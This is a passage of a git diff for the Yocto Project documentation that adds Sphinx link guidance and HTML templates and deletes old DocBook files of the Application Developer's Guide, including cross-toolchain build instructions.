+     are defined in the project documentation:
+
+       python -msphinx.ext.intersphinx <path to build folder>/html/objects.inv
+
+This dump contains all links and for each link it shows the default
+"Link Text" that Sphinx would use. If the default link text is not
+appropriate, a custom link text can be used in the ':ref:' directive.
+
+Extlinks
 ========
-Contains various templates, fonts, and some old PNG files.
 
-tools
-=====
-Contains a tool to convert the DocBook files to PDF format.  This folder also
-contains the mega-manual.sed file, which is used by Makefile to process
-cross-references from within the manual that normally go to an external
-manual.
+The sphinx.ext.extlinks extension is enabled by default
+(https://sublime-and-sphinx-guide.readthedocs.io/en/latest/references.html#use-the-external-links-extension),
+and it is configured with:
+
+  'yocto_home': ('https://yoctoproject.org%s', None),
+  'yocto_wiki': ('https://wiki.yoctoproject.org%s', None),
+  'yocto_dl': ('https://downloads.yoctoproject.org%s', None),
+  'yocto_lists': ('https://lists.yoctoproject.org%s', None),
+  'yocto_bugs': ('https://bugzilla.yoctoproject.org%s', None),
+  'yocto_ab': ('https://autobuilder.yoctoproject.org%s', None),
+  'yocto_docs': ('https://docs.yoctoproject.org%s', None),
+  'yocto_git': ('https://git.yoctoproject.org%s', None),
+  'oe_home': ('https://www.openembedded.org%s', None),
+  'oe_lists': ('https://lists.openembedded.org%s', None),
+
+It creates convenient shortcuts which can be used throughout the
+documentation rst files, as:
+
+  Please check this :yocto_wiki:`wiki page </Weekly_Status>`
+
+Intersphinx links
+=================
+
+The sphinx.ext.intersphinx extension is enabled by default
+(https://www.sphinx-doc.org/en/master/usage/extensions/intersphinx.html),
+so that we can cross reference content from other Sphinx based
+documentation projects, such as the BitBake manual.
+
+References to the bitbake manual can be done like this:
+
+  See the ":ref:`-D <bitbake:bitbake-user-manual/bitbake-user-manual-intro:usage and syntax>`" option
+or
+  :term:`bitbake:BB_NUMBER_PARSE_THREADS`
diff --git a/documentation/_templates/breadcrumbs.html b/documentation/_templates/breadcrumbs.html
new file mode 100644
index 0000000000..eb6244b74c
--- /dev/null
+++ b/documentation/_templates/breadcrumbs.html
@@ -0,0 +1,14 @@
+{% extends "!breadcrumbs.html" %}
+
+{% block breadcrumbs %}
+    <li>
+      <span class="doctype_switcher_placeholder">{{ doctype or 'single' }}</span>
+      <span class="version_switcher_placeholder">{{ release }}</span>
+    </li>
+    <li> &raquo;</li>
+    {% for doc in parents %}
+      <li><a href="{{ doc.link|e }}">{{ doc.title }}</a> &raquo;</li>
+    {% endfor %}
+    <li>{{ title }}</li>
+{% endblock %}
+
diff --git a/documentation/_templates/footer.html b/documentation/_templates/footer.html
new file mode 100644
index 0000000000..508129ede4
--- /dev/null
+++ b/documentation/_templates/footer.html
@@ -0,0 +1,12 @@
+<footer>
+  <hr/>
+  <div role="contentinfo">
+    <p> A Linux Foundation Collaborative Project.
+        <br> All Rights Reserved. Linux Foundation&reg; and Yocto Project&reg; are registered trademarks of the Linux Foundation.
+        <br>Linux&reg; is a registered trademark of Linus Torvalds.
+        <br>&copy; Copyright {{ copyright }}
+        <br>Last updated on {{ last_updated }}
+    </p>
+  </div>
+</footer>
+
diff --git a/documentation/_templates/layout.html b/documentation/_templates/layout.html
new file mode 100644
index 0000000000..308d5c7a28
--- /dev/null
+++ b/documentation/_templates/layout.html
@@ -0,0 +1,7 @@
+{% extends "!layout.html" %}
+
+{% block extrabody %}
+<div id="outdated-warning" style="text-align: center; background-color: #FFBABA; color: #6A0E0E;">
+</div>
+{% endblock %}
+
diff --git a/documentation/adt-manual/adt-command.xml b/documentation/adt-manual/adt-command.xml
deleted file mode 100644
index c78d18a16d..0000000000
--- a/documentation/adt-manual/adt-command.xml
+++ /dev/null
@@ -1,265 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<chapter id='using-the-command-line'>
-<title>Using the Command Line</title>
-
-    <para>
-        Recall that earlier the manual discussed how to use an existing toolchain
-        tarball that had been installed into the default installation
-        directory, <filename>/opt/poky/&DISTRO;</filename>, which is outside of the
-        <ulink url='&YOCTO_DOCS_DEV_URL;#build-directory'>Build Directory</ulink>
-        (see the section "<link linkend='using-an-existing-toolchain-tarball'>Using a Cross-Toolchain Tarball)</link>".
-        And, that sourcing your architecture-specific environment setup script
-        initializes a suitable cross-toolchain development environment.
-    </para>
-
-    <para>
-        During this setup, locations for the compiler, QEMU scripts, QEMU binary,
-        a special version of <filename>pkgconfig</filename> and other useful
-        utilities are added to the <filename>PATH</filename> variable.
-        Also, variables to assist
-        <filename>pkgconfig</filename> and <filename>autotools</filename>
-        are also defined so that, for example, <filename>configure.sh</filename>
-        can find pre-generated test results for tests that need target hardware
-        on which to run.
-        You can see the
-        "<link linkend='setting-up-the-cross-development-environment'>Setting Up the Cross-Development Environment</link>"
-        section for the list of cross-toolchain environment variables
-        established by the script.
-    </para>
-
-    <para>
-        Collectively, these conditions allow you to easily use the toolchain
-        outside of the OpenEmbedded build environment on both Autotools-based
-        projects and Makefile-based projects.
-        This chapter provides information for both these types of projects.
-    </para>
-
-
-<section id='autotools-based-projects'>
-<title>Autotools-Based Projects</title>
-
-    <para>
-        Once you have a suitable cross-toolchain installed, it is very easy to
-        develop a project outside of the OpenEmbedded build system.
-        This section presents a simple "Helloworld" example that shows how
-        to set up, compile, and run the project.
-    </para>
-
-    <section id='creating-and-running-a-project-based-on-gnu-autotools'>
-        <title>Creating and Running a Project Based on GNU Autotools</title>
-
-        <para>
-            Follow these steps to create a simple Autotools-based project:
-            <orderedlist>
-                <listitem><para><emphasis>Create your directory:</emphasis>
-                    Create a clean directory for your project and then make
-                    that directory your working location:
-                    <literallayout class='monospaced'>
-     $ mkdir $HOME/helloworld
-     $ cd $HOME/helloworld
-                    </literallayout></para></listitem>
-                <listitem><para><emphasis>Populate the directory:</emphasis>
-                    Create <filename>hello.c</filename>, <filename>Makefile.am</filename>,
-                    and <filename>configure.in</filename> files as follows:
-                    <itemizedlist>
-                        <listitem><para>For <filename>hello.c</filename>, include
-                            these lines:
-                            <literallayout class='monospaced'>
-     #include &lt;stdio.h&gt;
-
-     main()
-        {
-           printf("Hello World!\n");
-        }
-                            </literallayout></para></listitem>
-                        <listitem><para>For <filename>Makefile.am</filename>,
-                            include these lines:
-                            <literallayout class='monospaced'>
-     bin_PROGRAMS = hello
-     hello_SOURCES = hello.c
-                            </literallayout></para></listitem>
-                        <listitem><para>For <filename>configure.in</filename>,
-                            include these lines:
-                            <literallayout class='monospaced'>
-     AC_INIT(hello.c)
-     AM_INIT_AUTOMAKE(hello,0.1)
-     AC_PROG_CC
-     AC_PROG_INSTALL
-     AC_OUTPUT(Makefile)
-                            </literallayout></para></listitem>
-                    </itemizedlist></para></listitem>
-                <listitem><para><emphasis>Source the cross-toolchain
-                    environment setup file:</emphasis>
-                    Installation of the cross-toolchain creates a cross-toolchain
-                    environment setup script in the directory that the ADT
-                    was installed.
-                    Before you can use the tools to develop your project, you must
-                    source this setup script.
-                    The script begins with the string "environment-setup" and contains
-                    the machine architecture, which is followed by the string
-                    "poky-linux".
-                    Here is an example that sources a script from the
-                    default ADT installation directory that uses the
-                    32-bit Intel x86 Architecture and the
-                    &DISTRO_NAME; Yocto Project release:
-                    <literallayout class='monospaced'>
-     $ source /opt/poky/&DISTRO;/environment-setup-i586-poky-linux
-                    </literallayout></para></listitem>
-                <listitem><para><emphasis>Generate the local aclocal.m4
-                    files and create the configure script:</emphasis>
-                    The following GNU Autotools generate the local
-                    <filename>aclocal.m4</filename> files and create the
-                    configure script:
-                    <literallayout class='monospaced'>
-     $ aclocal
-     $ autoconf
-                    </literallayout></para></listitem>
-                <listitem><para><emphasis>Generate files needed by GNU
-                    coding standards:</emphasis>
-                    GNU coding standards require certain files in order for the
-                    project to be compliant.
-                    This command creates those files:
-                    <literallayout class='monospaced'>
-     $ touch NEWS README AUTHORS ChangeLog
-                    </literallayout></para></listitem>
-                <listitem><para><emphasis>Generate the configure
-                    file:</emphasis>
-                    This command generates the <filename>configure</filename>:
-                    <literallayout class='monospaced'>
-     $ automake -a
-                    </literallayout></para></listitem>
-                <listitem><para><emphasis>Cross-compile the project:</emphasis>
-                    This command compiles the project using the cross-compiler.
-                    The
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-CONFIGURE_FLAGS'><filename>CONFIGURE_FLAGS</filename></ulink>
-                    environment variable provides the minimal arguments for
-                    GNU configure:
-                    <literallayout class='monospaced'>
-     $ ./configure ${CONFIGURE_FLAGS}
-                    </literallayout></para></listitem>
-                <listitem><para><emphasis>Make and install the project:</emphasis>
-                    These two commands generate and install the project into the
-                    destination directory:
-                    <literallayout class='monospaced'>
-     $ make
-     $ make install DESTDIR=./tmp
-                    </literallayout></para></listitem>
-                <listitem><para><emphasis>Verify the installation:</emphasis>
-                    This command is a simple way to verify the installation
-                    of your project.
-                    Running the command prints the architecture on which
-                    the binary file can run.
-                    This architecture should be the same architecture that
-                    the installed cross-toolchain supports.
-                    <literallayout class='monospaced'>
-     $ file ./tmp/usr/local/bin/hello
-                    </literallayout></para></listitem>
-                <listitem><para><emphasis>Execute your project:</emphasis>
-                    To execute the project in the shell, simply enter the name.
-                    You could also copy the binary to the actual target hardware
-                    and run the project there as well:
-                    <literallayout class='monospaced'>
-     $ ./hello
-                    </literallayout>
-                    As expected, the project displays the "Hello World!" message.
-                    </para></listitem>
-            </orderedlist>
-        </para>
-    </section>
-
-    <section id='passing-host-options'>
-        <title>Passing Host Options</title>
-
-        <para>
-            For an Autotools-based project, you can use the cross-toolchain by just
-            passing the appropriate host option to <filename>configure.sh</filename>.
-            The host option you use is derived from the name of the environment setup
-            script found in the directory in which you installed the cross-toolchain.
-            For example, the host option for an ARM-based target that uses the GNU EABI
-            is <filename>armv5te-poky-linux-gnueabi</filename>.
-            You will notice that the name of the script is
-            <filename>environment-setup-armv5te-poky-linux-gnueabi</filename>.
-            Thus, the following command works to update your project and
-            rebuild it using the appropriate cross-toolchain tools:
-            <literallayout class='monospaced'>
-     $ ./configure --host=armv5te-poky-linux-gnueabi \
-        --with-libtool-sysroot=<replaceable>sysroot_dir</replaceable>
-            </literallayout>
-            <note>
-                If the <filename>configure</filename> script results in problems recognizing the
-                <filename>--with-libtool-sysroot=</filename><replaceable>sysroot-dir</replaceable> option,
-                regenerate the script to enable the support by doing the following and then
-                run the script again:
-                <literallayout class='monospaced'>
-     $ libtoolize --automake
-     $ aclocal -I ${OECORE_NATIVE_SYSROOT}/usr/share/aclocal \
-        [-I <replaceable>dir_containing_your_project-specific_m4_macros</replaceable>]
-     $ autoconf
-     $ autoheader
-     $ automake -a
-                </literallayout>
-            </note>
-        </para>
-    </section>
-</section>
-
-<section id='makefile-based-projects'>
-<title>Makefile-Based Projects</title>
-
-    <para>
-        For Makefile-based projects, the cross-toolchain environment variables
-        established by running the cross-toolchain environment setup script
-        are subject to general <filename>make</filename> rules.
-    </para>
-
-    <para>
-        To illustrate this, consider the following four cross-toolchain
-        environment variables:
-        <literallayout class='monospaced'>
-     <ulink url='&YOCTO_DOCS_REF_URL;#var-CC'>CC</ulink>=i586-poky-linux-gcc -m32 -march=i586 --sysroot=/opt/poky/1.8/sysroots/i586-poky-linux
-     <ulink url='&YOCTO_DOCS_REF_URL;#var-LD'>LD</ulink>=i586-poky-linux-ld --sysroot=/opt/poky/1.8/sysroots/i586-poky-linux
-     <ulink url='&YOCTO_DOCS_REF_URL;#var-CFLAGS'>CFLAGS</ulink>=-O2 -pipe -g -feliminate-unused-debug-types
-     <ulink url='&YOCTO_DOCS_REF_URL;#var-CXXFLAGS'>CXXFLAGS</ulink>=-O2 -pipe -g -feliminate-unused-debug-types
-        </literallayout>
-        Now, consider the following three cases:
-        <itemizedlist>
-            <listitem><para><emphasis>Case 1 - No Variables Set in the <filename>Makefile</filename>:</emphasis>
-                Because these variables are not specifically set in the
-                <filename>Makefile</filename>, the variables retain their
-                values based on the environment.
-                </para></listitem>
-            <listitem><para><emphasis>Case 2 - Variables Set in the <filename>Makefile</filename>:</emphasis>
-                Specifically setting variables in the
-                <filename>Makefile</filename> during the build results in the
-                environment settings of the variables being overwritten.
-                </para></listitem>
-            <listitem><para><emphasis>Case 3 - Variables Set when the <filename>Makefile</filename> is Executed from the Command Line:</emphasis>
-                Executing the <filename>Makefile</filename> from the command
-                line results in the variables being overwritten with
-                command-line content regardless of what is being set in the
-                <filename>Makefile</filename>.
-                In this case, environment variables are not considered unless
-                you use the "-e" flag during the build:
-                <literallayout class='monospaced'>
-     $ make -e <replaceable>file</replaceable>
-                </literallayout>
-                If you use this flag, then the environment values of the
-                variables override any variables specifically set in the
-                <filename>Makefile</filename>.
-                </para></listitem>
-        </itemizedlist>
-        <note>
-            For the list of variables set up by the cross-toolchain environment
-            setup script, see the
-            "<link linkend='setting-up-the-cross-development-environment'>Setting Up the Cross-Development Environment</link>"
-            section.
-        </note>
-    </para>
-</section>
-</chapter>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/adt-manual/adt-intro.xml b/documentation/adt-manual/adt-intro.xml
deleted file mode 100644
index 597c7120ba..0000000000
--- a/documentation/adt-manual/adt-intro.xml
+++ /dev/null
@@ -1,180 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<chapter id='adt-intro'>
-    <title>The Application Development Toolkit (ADT)</title>
-
-    <para>
-        Part of the Yocto Project development solution is an Application Development
-        Toolkit (ADT).
-        The ADT provides you with a custom-built, cross-development
-        platform suited for developing a user-targeted product application.
-    </para>
-
-    <para>
-        Fundamentally, the ADT consists of the following:
-        <itemizedlist>
-            <listitem><para>An architecture-specific cross-toolchain and matching
-                sysroot both built by the
-                <ulink url='&YOCTO_DOCS_DEV_URL;#build-system-term'>OpenEmbedded build system</ulink>.
-                The toolchain and sysroot are based on a
-                <ulink url='&YOCTO_DOCS_DEV_URL;#metadata'>Metadata</ulink>
-                configuration and extensions,
-                which allows you to cross-develop on the host machine for the target hardware.
-                </para></listitem>
-            <listitem><para>The Eclipse IDE Yocto Plug-in.</para></listitem>
-            <listitem><para>The Quick EMUlator (QEMU), which lets you simulate target hardware.
-                </para></listitem>
-            <listitem><para>Various user-space tools that greatly enhance your application
-                development experience.</para></listitem>
-        </itemizedlist>
-    </para>
-
-    <section id='the-cross-development-toolchain'>
-        <title>The Cross-Development Toolchain</title>
-
-        <para>
-            The
-            <ulink url='&YOCTO_DOCS_DEV_URL;#cross-development-toolchain'>Cross-Development Toolchain</ulink>
-            consists of a cross-compiler, cross-linker, and cross-debugger
-            that are used to develop user-space applications for targeted
-            hardware.
-            This toolchain is created either by running the ADT Installer
-            script, a toolchain installer script, or through a
-            <ulink url='&YOCTO_DOCS_DEV_URL;#build-directory'>Build Directory</ulink>
-            that is based on your Metadata configuration or extension for
-            your targeted device.
-            The cross-toolchain works with a matching target sysroot.
-        </para>
-    </section>
-
-    <section id='sysroot'>
-        <title>Sysroot</title>
-
-        <para>
-            The matching target sysroot contains needed headers and libraries for generating
-            binaries that run on the target architecture.
-            The sysroot is based on the target root filesystem image that is built by
-            the OpenEmbedded build system and uses the same Metadata configuration
-            used to build the cross-toolchain.
-        </para>
-    </section>
-
-    <section id='eclipse-overview'>
-        <title>Eclipse Yocto Plug-in</title>
-
-        <para>
-            The Eclipse IDE is a popular development environment and it fully supports
-            development using the Yocto Project.
-            When you install and configure the Eclipse Yocto Project Plug-in into
-            the Eclipse IDE, you maximize your Yocto Project experience.
-            Installing and configuring the Plug-in results in an environment that
-            has extensions specifically designed to let you more easily develop software.
-            These extensions allow for cross-compilation, deployment, and execution of
-            your output into a QEMU emulation session.
-            You can also perform cross-debugging and profiling.
-            The environment also supports a suite of tools that allows you to perform
-            remote profiling, tracing, collection of power data, collection of
-            latency data, and collection of performance data.
-        </para>
-
-        <para>
-            For information about the application development workflow that uses the Eclipse
-            IDE and for a detailed example of how to install and configure the Eclipse
-            Yocto Project Plug-in, see the
-            "<ulink url='&YOCTO_DOCS_DEV_URL;#adt-eclipse'>Working Within Eclipse</ulink>" section
-            of the Yocto Project Development Manual.
-        </para>
-    </section>
-
-    <section id='the-qemu-emulator'>
-        <title>The QEMU Emulator</title>
-
-        <para>
-            The QEMU emulator allows you to simulate your hardware while running your
-            application or image.
-            QEMU is made available a number of ways:
-            <itemizedlist>
-                <listitem><para>
-                    If you use the ADT Installer script to install ADT, you can
-                    specify whether or not to install QEMU.
-                    </para></listitem>
-                <listitem><para>
-                    If you have cloned the <filename>poky</filename> Git
-                    repository to create a
-                    <ulink url='&YOCTO_DOCS_DEV_URL;#source-directory'>Source Directory</ulink>
-                    and you have sourced the environment setup script, QEMU is
-                    installed and automatically available.
-                    </para></listitem>
-                <listitem><para>
-                    If you have downloaded a Yocto Project release and unpacked
-                    it to create a
-                    <ulink url='&YOCTO_DOCS_DEV_URL;#source-directory'>Source Directory</ulink>
-                    and you have sourced the environment setup script, QEMU is
-                    installed and automatically available.
-                    </para></listitem>
-                <listitem><para>
-                    If you have installed the cross-toolchain tarball and you
-                    have sourced the toolchain's setup environment script, QEMU
-                    is also installed and automatically available.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-
-    <section id='user-space-tools'>
-        <title>User-Space Tools</title>
-
-        <para>
-            User-space tools are included as part of the Yocto Project.
-            You will find these tools helpful during development.
-            The tools include LatencyTOP, PowerTOP, OProfile, Perf, SystemTap, and Lttng-ust.
-            These tools are common development tools for the Linux platform.
-            <itemizedlist>
-                <listitem><para><emphasis>LatencyTOP:</emphasis> LatencyTOP focuses on latency
-                    that causes skips in audio,
-                    stutters in your desktop experience, or situations that overload your server
-                    even when you have plenty of CPU power left.
-                    </para></listitem>
-                <listitem><para><emphasis>PowerTOP:</emphasis> Helps you determine what
-                    software is using the most power.
-                    You can find out more about PowerTOP at
-                    <ulink url='https://01.org/powertop/'></ulink>.</para></listitem>
-                <listitem><para><emphasis>OProfile:</emphasis> A system-wide profiler for Linux
-                    systems that is capable of profiling all running code at low overhead.
-                    You can find out more about OProfile at
-                    <ulink url='http://oprofile.sourceforge.net/about/'></ulink>.
-                    For examples on how to setup and use this tool, see the
-                    "<ulink url='&YOCTO_DOCS_PROF_URL;#profile-manual-oprofile'>OProfile</ulink>"
-                    section in the Yocto Project Profiling and Tracing Manual.
-                    </para></listitem>
-                <listitem><para><emphasis>Perf:</emphasis> Performance counters for Linux used
-                    to keep track of certain types of hardware and software events.
-                    For more information on these types of counters see
-                    <ulink url='https://perf.wiki.kernel.org/'></ulink>.
-                    For examples on how to setup and use this tool, see the
-                    "<ulink url='&YOCTO_DOCS_PROF_URL;#profile-manual-perf'>perf</ulink>"
-                    section in the Yocto Project Profiling and Tracing Manual.
-                    </para></listitem>
-                <listitem><para><emphasis>SystemTap:</emphasis> A free software infrastructure
-                    that simplifies information gathering about a running Linux system.
-                    This information helps you diagnose performance or functional problems.
-                    SystemTap is not available as a user-space tool through the Eclipse IDE Yocto Plug-in.
-                    See <ulink url='http://sourceware.org/systemtap'></ulink> for more information
-                    on SystemTap.
-                    For examples on how to setup and use this tool, see the
-                    "<ulink url='&YOCTO_DOCS_PROF_URL;#profile-manual-systemtap'>SystemTap</ulink>"
-                    section in the Yocto Project Profiling and Tracing Manual.</para></listitem>
-                <listitem><para><emphasis>Lttng-ust:</emphasis> A User-space Tracer designed to
-                    provide detailed information on user-space activity.
-                    See <ulink url='http://lttng.org/ust'></ulink> for more information on Lttng-ust.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-
-</chapter>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/adt-manual/adt-manual-customization.xsl b/documentation/adt-manual/adt-manual-customization.xsl
deleted file mode 100644
index b86be519b9..0000000000
--- a/documentation/adt-manual/adt-manual-customization.xsl
+++ /dev/null
@@ -1,27 +0,0 @@
-<?xml version='1.0'?>
-<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns="http://www.w3.org/1999/xhtml" xmlns:fo="http://www.w3.org/1999/XSL/Format" version="1.0">
-
-  <xsl:import href="http://downloads.yoctoproject.org/mirror/docbook-mirror/docbook-xsl-1.76.1/xhtml/docbook.xsl" />
-
-<!--
-
-  <xsl:import href="../template/1.76.1/docbook-xsl-1.76.1/xhtml/docbook.xsl" />
-
-  <xsl:import href="http://docbook.sourceforge.net/release/xsl/1.76.1/xhtml/docbook.xsl" />
-
--->
-
-  <xsl:include href="../template/permalinks.xsl"/>
-  <xsl:include href="../template/section.title.xsl"/>
-  <xsl:include href="../template/component.title.xsl"/>
-  <xsl:include href="../template/division.title.xsl"/>
-  <xsl:include href="../template/formal.object.heading.xsl"/>
-
-  <xsl:param name="html.stylesheet" select="'adt-style.css'" />
-  <xsl:param name="chapter.autolabel" select="1" />
-  <xsl:param name="appendix.autolabel" select="A" />
-  <xsl:param name="section.autolabel" select="1" />
-  <xsl:param name="section.label.includes.component.label" select="1" />
-  <xsl:param name="generate.id.attributes" select="1" />
-
-</xsl:stylesheet>
diff --git a/documentation/adt-manual/adt-manual-eclipse-customization.xsl b/documentation/adt-manual/adt-manual-eclipse-customization.xsl
deleted file mode 100644
index 77ba5f5719..0000000000
--- a/documentation/adt-manual/adt-manual-eclipse-customization.xsl
+++ /dev/null
@@ -1,35 +0,0 @@
-<?xml version='1.0'?>
-<xsl:stylesheet
-	xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
-	xmlns="http://www.w3.org/1999/xhtml"
-	xmlns:fo="http://www.w3.org/1999/XSL/Format"
-	version="1.0">
-
-  <xsl:import href="http://downloads.yoctoproject.org/mirror/docbook-mirror/docbook-xsl-1.76.1/eclipse/eclipse3.xsl" />
-
-<!--
-
-  <xsl:import href="../template/1.76.1/docbook-xsl-1.76.1/eclipse/eclipse3.xsl" />
-
-  <xsl:import
-	  href="http://docbook.sourceforge.net/release/xsl/1.76.1/eclipse/eclipse3.xsl" />
-
--->
-
-  <xsl:param name="chunker.output.indent" select="'yes'"/>
-  <xsl:param name="chunk.quietly" select="1"/>
-  <xsl:param name="chunk.first.sections" select="1"/>
-  <xsl:param name="chunk.section.depth" select="10"/>
-  <xsl:param name="use.id.as.filename" select="1"/>
-  <xsl:param name="ulink.target" select="'_self'" />
-  <xsl:param name="base.dir" select="'html/adt-manual/'"/>
-  <xsl:param name="html.stylesheet" select="'../book.css'"/>
-  <xsl:param name="eclipse.manifest" select="0"/>
-  <xsl:param name="create.plugin.xml" select="0"/>
-  <xsl:param name="suppress.navigation" select="1"/>
-  <xsl:param name="generate.index" select="0"/>
-  <xsl:param name="chapter.autolabel" select="1" />
-  <xsl:param name="appendix.autolabel" select="1" />
-  <xsl:param name="section.autolabel" select="1" />
-  <xsl:param name="section.label.includes.component.label" select="1" />
-</xsl:stylesheet>
diff --git a/documentation/adt-manual/adt-manual-intro.xml b/documentation/adt-manual/adt-manual-intro.xml
deleted file mode 100644
index 034fdff609..0000000000
--- a/documentation/adt-manual/adt-manual-intro.xml
+++ /dev/null
@@ -1,33 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<chapter id='adt-manual-intro'>
-<title>Introduction</title>
-
-    <para>
-        Welcome to the Yocto Project Application Developer's Guide.
-        This manual provides information that lets you begin developing applications
-        using the Yocto Project.
-    </para>
-
-    <para>
-        The Yocto Project provides an application development environment based on
-        an Application Development Toolkit (ADT) and the availability of stand-alone
-        cross-development toolchains and other tools.
-        This manual describes the ADT and how you can configure and install it,
-        how to access and use the cross-development toolchains, how to
-        customize the development packages installation,
-        how to use command-line development for both Autotools-based and
-        Makefile-based projects, and an introduction to the
-        <trademark class='trade'>Eclipse</trademark> IDE Yocto Plug-in.
-        <note>
-            The ADT is distribution-neutral and does not require the Yocto
-            Project reference distribution, which is called Poky.
-            This manual, however, uses examples that use the Poky distribution.
-        </note>
-    </para>
-</chapter>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/adt-manual/adt-manual.xml b/documentation/adt-manual/adt-manual.xml
deleted file mode 100644
index 972f8bf086..0000000000
--- a/documentation/adt-manual/adt-manual.xml
+++ /dev/null
@@ -1,140 +0,0 @@
-<!DOCTYPE book PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<book id='adt-manual' lang='en'
-      xmlns:xi="http://www.w3.org/2003/XInclude"
-      xmlns="http://docbook.org/ns/docbook"
-      >
-    <bookinfo>
-
-        <mediaobject>
-            <imageobject>
-                <imagedata fileref='figures/adt-title.png'
-                    format='SVG'
-                    align='left' scalefit='1' width='100%'/>
-            </imageobject>
-        </mediaobject>
-
-        <title>
-            Yocto Project Application Developer's Guide
-        </title>
-
-        <authorgroup>
-            <author>
-                <firstname>Jessica</firstname> <surname>Zhang</surname>
-                <affiliation>
-                    <orgname>Intel Corporation</orgname>
-                </affiliation>
-                <email>jessica.zhang@intel.com</email>
-            </author>
-        </authorgroup>
-
-        <revhistory>
-            <revision>
-                <revnumber>1.0</revnumber>
-                <date>6 April 2011</date>
-                <revremark>Released with the Yocto Project 1.0 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>1.0.1</revnumber>
-                <date>23 May 2011</date>
-                <revremark>Released with the Yocto Project 1.0.1 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>1.1</revnumber>
-                <date>6 October 2011</date>
-                <revremark>Released with the Yocto Project 1.1 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>1.2</revnumber>
-                <date>April 2012</date>
-                <revremark>Released with the Yocto Project 1.2 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>1.3</revnumber>
-                <date>October 2012</date>
-                <revremark>Released with the Yocto Project 1.3 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>1.4</revnumber>
-                <date>April 2013</date>
-                <revremark>Released with the Yocto Project 1.4 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>1.5</revnumber>
-                <date>October 2013</date>
-                <revremark>Released with the Yocto Project 1.5 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>1.5.1</revnumber>
-                <date>January 2014</date>
-                <revremark>Released with the Yocto Project 1.5.1 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>1.6</revnumber>
-                <date>April 2014</date>
-                <revremark>Released with the Yocto Project 1.6 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>1.7</revnumber>
-                <date>October 2014</date>
-                <revremark>Released with the Yocto Project 1.7 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>1.8</revnumber>
-                <date>April 2015</date>
-                <revremark>Released with the Yocto Project 1.8 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>2.0</revnumber>
-                <date>October 2015</date>
-                <revremark>Released with the Yocto Project 2.0 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>2.1</revnumber>
-                <date>Sometime in 2016</date>
-                <revremark>Released with the future Yocto Project 2.1 Release.</revremark>
-            </revision>
-       </revhistory>
-
-    <copyright>
-      <year>&COPYRIGHT_YEAR;</year>
-      <holder>Linux Foundation</holder>
-    </copyright>
-
-    <legalnotice>
-      <para>
-        Permission is granted to copy, distribute and/or modify this document under
-        the terms of the <ulink type="http" url="http://creativecommons.org/licenses/by-sa/2.0/uk/">Creative Commons Attribution-Share Alike 2.0 UK: England &amp; Wales</ulink> as published by Creative Commons.
-      </para>
-      <note>
-          For the latest version of this manual associated with this
-          Yocto Project release, see the
-          <ulink url='&YOCTO_DOCS_ADT_URL;'>Yocto Project Application Developer's Guide</ulink>
-          from the Yocto Project website.
-      </note>
-
-    </legalnotice>
-
-    </bookinfo>
-
-    <xi:include href="adt-manual-intro.xml"/>
-
-    <xi:include href="adt-intro.xml"/>
-
-    <xi:include href="adt-prepare.xml"/>
-
-    <xi:include href="adt-package.xml"/>
-
-    <xi:include href="adt-command.xml"/>
-
-<!--    <index id='index'>
-      <title>Index</title>
-    </index>
--->
-
-</book>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/adt-manual/adt-package.xml b/documentation/adt-manual/adt-package.xml
deleted file mode 100644
index 68eee9b389..0000000000
--- a/documentation/adt-manual/adt-package.xml
+++ /dev/null
@@ -1,102 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<chapter id='adt-package'>
-<title>Optionally Customizing the Development Packages Installation</title>
-
-    <para>
-        Because the Yocto Project is suited for embedded Linux development, it is
-        likely that you will need to customize your development packages installation.
-        For example, if you are developing a minimal image, then you might not need
-        certain packages (e.g. graphics support packages).
-        Thus, you would like to be able to remove those packages from your target sysroot.
-    </para>
-
-<section id='package-management-systems'>
-    <title>Package Management Systems</title>
-
-    <para>
-        The OpenEmbedded build system supports the generation of sysroot files using
-        three different Package Management Systems (PMS):
-        <itemizedlist>
-            <listitem><para><emphasis>OPKG:</emphasis> A less well known PMS whose use
-                originated in the OpenEmbedded and OpenWrt embedded Linux projects.
-                This PMS works with files packaged in an <filename>.ipk</filename> format.
-                See <ulink url='http://en.wikipedia.org/wiki/Opkg'></ulink> for more
-                information about OPKG.</para></listitem>
